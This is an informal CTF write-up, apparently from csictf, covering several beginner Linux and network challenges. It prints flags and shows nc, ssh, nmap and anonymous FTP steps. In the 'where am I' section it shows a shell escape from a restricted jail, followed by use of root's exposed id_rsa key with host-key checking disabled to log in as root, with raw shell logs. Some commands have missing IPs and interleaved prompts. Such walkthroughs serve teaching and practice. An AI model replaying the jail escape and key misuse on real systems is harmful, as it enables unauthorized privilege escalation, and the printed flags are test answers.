nc 30611
FLAG : csictf{1_4m_cl4rk3_k3nt}
An ssh shell was given ..
ssh -p 30630 Password is find32
FLAG : csictf{th15_15_unu5u41}
As the flag is not wrapped in csictf{} i searched for “_” and found
I got a dummy flag and some numbers written after user 2 maybe password.
So i logged onto user 2 and searched for “_” and got the flag.
The IP was gien : So I began with nmap scan.
At I first I thinks it would be two three steps hacking like extracting pass from ftp port ….. But unfortunately it was wasy easier I tried to connect ftp since Anonymous FTP login allowed there was no issue
ftp -p 5001
But since no commands were working I opened the ftp in browser and flag was their only :
Given IP : nc 30623
At first on connecting to it you will get that it’s a linux jail but it can easily be break by /bin/sh -i 2>&1, So I just followed the normal linux commands and found id_rsa for the root user, but when I was trying to connect through it was spiting this error.
where-am-i-544787754f-rhtps:/root/.ssh$ ssh -i /root/.ssh/id_rsa root@localhost
lsPseudo-terminal will not be allocated because stdin is not a terminal.
Could not create directory '/home/ctf/.ssh'.
Host key verification failed.
But by little bit googling I got the solution to my errors from this link.
Here is complete steps :
root@kali:~# nc 30623
Where am I?
/bin/sh -i 2>&1
/bin/sh: can't access tty; job control turned off
where-am-i-544787754f-qn2wt:/home/ctf$ cd ../..
where-am-i-544787754f-qn2wt:/$ ls -la
total 76
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 .
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 ..
-r-xr-xr-x 1 root root 0 Jul 20 07:51 .dockerenv
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 bin
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 dev
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 etc
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 home
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 lib
dr-xr-xr-x 1 root root 4096 May 29 14:20 media
dr-xr-xr-x 1 root root 4096 May 29 14:20 mnt
dr-xr-xr-x 1 root root 4096 May 29 14:20 opt
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 proc
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 root
dr-xr-xr-x 1 root root 4096 May 29 14:20 run
dr-xr-xr-x 1 root root 4096 May 29 14:20 sbin
dr-xr-xr-x 1 root root 4096 May 29 14:20 srv
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 sys
dr-xr-xr-x 1 root root 4096 May 29 14:20 tmp
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 usr
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 var
where-am-i-544787754f-qn2wt:/$ cd root
where-am-i-544787754f-qn2wt:/root$ ls -la
total 12
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 .
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 ..
dr-xr-xr-x 1 root root 4096 Jul 20 07:52 .ssh
where-am-i-544787754f-qn2wt:/root$ cd .ssh
where-am-i-544787754f-qn2wt:/root/.ssh$ ls -la
total 20
dr-xr-xr-x 1 root root 4096 Jul 20 07:52 .
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 ..
-r-xr-xr-x 1 root root 571 Jul 20 07:52 authorized_keys
-r-xr-xr-x 1 root root 2602 Jul 20 07:51 id_rsa
-r-xr-xr-x 1 root root 571 Jul 20 07:51
where-am-i-544787754f-qn2wt:/root/.ssh$ ssh -i id_rsa -t -t -o StrictHostKeyChecking=no root@localhost
root@kali:~# nc 30623
Where am I?
/bin/sh -i 2>&1
/bin/sh: can't access tty; job control turned off
where-am-i-6d4d9d997d-w429b:/home/ctf$ cd ../..
cd root
where-am-i-6d4d9d997d-w429b:/$ where-am-i-6d4d9d997d-w429b:/root$ cd .ssh
where-am-i-6d4d9d997d-w429b:/root/.ssh$ ls -la
total 20
dr-xr-xr-x 1 root root 4096 Jul 20 07:52 .
dr-xr-xr-x 1 root root 4096 Jul 20 07:51 ..
-r-xr-xr-x 1 root root 571 Jul 20 07:52 authorized_keys
-r-xr-xr-x 1 root root 2602 Jul 20 07:51 id_rsa
-r-xr-xr-x 1 root root 571 Jul 20 07:51
where-am-i-6d4d9d997d-w429b:/root/.ssh$ ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no root@localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
Could not create directory '/home/ctf/.ssh'.
Failed to add the host to the list of known hosts (/home/ctf/.ssh/known_hosts).